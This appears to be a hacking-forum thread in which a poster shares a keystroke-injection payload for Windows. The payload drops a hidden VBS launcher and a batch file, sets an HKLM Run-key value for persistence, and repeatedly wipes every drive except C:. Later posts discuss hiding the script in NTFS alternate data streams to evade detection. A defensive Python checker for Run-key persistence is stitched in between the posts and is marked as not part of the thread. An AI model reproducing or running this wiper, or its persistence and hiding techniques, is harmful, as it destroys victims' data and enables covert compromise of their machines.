overwraith Posted December 22, 2012 (edited)

I have had a similar payload written for a while, but the stuff in the batch wiper link that Darren provided gave me a few new ideas. I learned how to make a registry key that would restart the batch file on reboot. Apparently this requires admin rights to run since it modifies the registry. You can test this payload on your own machine by replacing the directory and file removing commands with a dir command. I also found a better Visual Basic file for invisibly running batch files online.

[CODE]
REM By overwraith
REM EraseFlashDrives.txt
REM PURPOSE: to delete the contents of attached drives.
CONTROL ESCAPE
STRING cmd /Q /D /T:7F /F:OFF /V:OFF /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
REM THE DIRECTORY YOU WANT TO HIDE THE SCRIPT IN
STRING cd %TEMP%
ENTER
REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY.
REM Delete vbs file if already exists
STRING erase /Q invis.vbs
ENTER
REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up
STRING copy con invis.vbs
ENTER
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
ENTER
CONTROL Z
ENTER
REM Delete batch file if already exists
STRING erase /Q SecurityBullseye.bat
ENTER
REM Make the batch file
REM SLIGHT THROWBACK TO VIDEO GAME BIOSHOCK I/II
STRING copy con SecurityBullseye.bat
ENTER
REM REGISTRY KEY RESTARTS THE SCRIPT ON REBOOT
STRING REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Persistence /t REG_SZ /d "wscript.exe %TEMP%\invis.vbs %TEMP%\SecurityBullseye.bat" /f
ENTER
STRING :while1
ENTER
REM C:\ IS USUALLY THE DRIVE THE OS IS INSTALLED ON, SO OMIT.
STRING for %%a in (A B D E F G H I J K L M N O P Q R S T U V W X Y Z) do (
ENTER
STRING IF EXIST %%a:\ erase /Q /S /F "%%a:\*.*"
ENTER
STRING IF EXIST %%a:\ rmdir /Q /S "%%a:\*"
ENTER
STRING )
ENTER
STRING timeout /t 60
ENTER
STRING goto :while1
ENTER
CONTROL Z
ENTER
REM RUN THE BATCH FILE
STRING wscript.exe invis.vbs SecurityBullseye.bat
ENTER
STRING EXIT
ENTER
[/CODE]

Edited December 22, 2012 by overwraith
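A defender-side check for the Run-key persistence used in the post above, added here as an example and not part of the original thread. It flags Run values that combine a script host, a user-writable directory, and a script file; the function names, signal list, and sample values are assumptions made for illustration, and only the `Persistence` value and its file names come from the post.

```python
import re
import sys

RUN_PATH = r"Software\Microsoft\Windows\CurrentVersion\Run"

# Heuristic signals (assumed for this example, tune for your environment).
# cmd expands %TEMP% before REG ADD runs, so the stored value usually holds
# the expanded path; both spellings are matched.
SIGNALS = {
    "script host": re.compile(r"(?i)\b(wscript|cscript|mshta|cmd|powershell)(\.exe)?\b"),
    "user-writable directory": re.compile(
        r"(?i)%te?mp%|%appdata%|\\appdata\\local\\temp\\|\\windows\\temp\\"),
    "script file": re.compile(r"(?i)\.(vbs|vbe|js|jse|wsf|bat|cmd|ps1)\b"),
}

def triage_run_values(values):
    """Return {value_name: [reasons]} for Run entries matching 2+ signals."""
    findings = {}
    for name, command in values.items():
        reasons = [label for label, rx in SIGNALS.items() if rx.search(command)]
        if len(reasons) >= 2:  # a single signal alone is too noisy
            findings[name] = reasons
    return findings

def read_run_values(hive_name):
    """Read the live Run key on Windows; hive_name is 'HKLM' or 'HKCU'."""
    import winreg
    hive = {"HKLM": winreg.HKEY_LOCAL_MACHINE,
            "HKCU": winreg.HKEY_CURRENT_USER}[hive_name]
    values = {}
    with winreg.OpenKey(hive, RUN_PATH) as key:
        for i in range(winreg.QueryInfoKey(key)[1]):
            name, data, _type = winreg.EnumValue(key, i)
            values[name] = str(data)
    return values

# Constructed sample data; "Persistence" mirrors the value the payload writes.
SAMPLE = {
    "Persistence": r"wscript.exe C:\Users\alice\AppData\Local\Temp\invis.vbs "
                   r"C:\Users\alice\AppData\Local\Temp\SecurityBullseye.bat",
    "SecurityHealth": r"%windir%\system32\SecurityHealthSystray.exe",
    "Updater": r'"C:\Program Files\Vendor\updater.exe" /background',
}

if __name__ == "__main__":
    live = sys.platform == "win32"
    for hive in (("HKLM", "HKCU") if live else ("sample",)):
        values = read_run_values(hive) if live else SAMPLE
        for name, reasons in triage_run_values(values).items():
            print(f"{hive} Run\\{name}: {', '.join(reasons)} -> {values[name]}")
```

On a non-Windows host the script triages the constructed sample; on Windows it reads both Run keys.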
overwraith Posted December 22, 2012 (edited)

May throw in some alternate data stream stuff later. Can hide the batch file behind another file using a colon. The biggest problem would be extracting one file name via the command line, and changing the rest of the script accordingly. Another thing that could make it easier would be just making the file to attach the alternate data stream to, and making it appear to be something Windows generated.

File1.txt:SecurityBullseye.bat

Would need specialized software like LADS or The Sleuth Kit to find it. Example...

[CODE]
C:\Users\UserName>echo hello > File1.txt
C:\Users\UserName>echo hello > File1.txt:SecurityBullseye.txt
C:\Users\UserName>dir *.txt /B
File1.txt
C:\Users\UserName>
[/CODE]

Edited December 22, 2012 by overwraith
overwraith Posted December 24, 2012

Recently discovered that Windows 7 removed the ability to execute things from alternate data streams.

http://superuser.com/questions/284406/how-do-i-execute-a-batch-file-in-an-alternate-data-stream-in-windows-7